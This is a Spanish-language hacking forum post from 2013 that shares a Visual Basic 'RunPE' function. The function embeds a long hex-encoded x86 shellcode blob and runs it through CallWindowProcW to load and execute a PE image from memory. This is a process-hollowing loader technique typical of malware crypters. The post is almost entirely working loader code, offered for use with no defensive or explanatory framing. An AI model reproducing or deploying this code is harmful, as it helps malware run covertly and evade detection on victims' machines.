comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

RunPE ASM en linea

  • 0 Respuestas
  • 2411 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Danyfirex

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Abril 30, 2013, 06:40:42 pm »
Bueno aquí este RunPE basado con el shellcode de covetous.eyes.


Código: Visual Basic
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Autor: Pink
  4. ' => RunPE ASM en Linea
  5. ' => Uso RunPE(Puntero Base Ejecutable) 'Pointer PE Image
  6. ' => Fecha : 30|04|2013
  7. ' => Todos los Creditos para covetous.eyes
  8. ' => Requisitos: Ejecutable debe tener tabla de relocalizaciones | PE Image must have  relocation table
  9. ' =================================================================
  10. ' =================================================================
  11.  
  12.  
  13. Option Explicit
  14.  
  15. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  16.  
  17.  
  18. Public Function RunPE(PE_Puntero As Long)
  19. Dim OP_Array() As Byte
  20. Dim Str_OP  As String
  21. Dim i As Long
  22.  
  23. Str_OP = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
  24.       "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
  25.       "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
  26.       "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
  27.       "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
  28.       "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
  29.       "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
  30.       "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
  31.       "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
  32.       "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
  33.       "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
  34.       "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
  35.       "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
  36.       "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
  37.       "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
  38.       "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
  39.       "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
  40.       "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
  41.       "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
  42.       "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
  43.       "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
  44.       "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
  45.       "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
  46.       "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
  47.       "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"
  48.  
  49.  
  50. ReDim OP_Array((Len(Str_OP) / 2) - 1)
  51. For i = 1 To Len(Str_OP) - 1 Step 2
  52. OP_Array(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
  53. Next
  54.  
  55. CallWindowProcW VarPtr(OP_Array(0)), PE_Puntero, 0, 0, 0
  56.  
  57.  
  58.  
  59. End Function

saludos
« Última modificación: Mayo 12, 2014, 02:58:45 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



[Cifrado] RC4 ASM en linea

Iniciado por Danyfirex

Respuestas: 2
Vistas: 2900
Último mensaje Abril 20, 2013, 01:23:49 pm
por Danyfirex
Runpe Mod K4

Iniciado por K4RUN4

Respuestas: 3
Vistas: 2185
Último mensaje Octubre 12, 2012, 02:58:49 am
por wh0!